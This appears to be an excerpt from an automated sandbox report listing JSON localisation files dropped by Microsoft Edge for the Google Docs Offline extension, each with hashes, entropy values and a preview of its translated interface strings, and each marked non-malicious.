                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
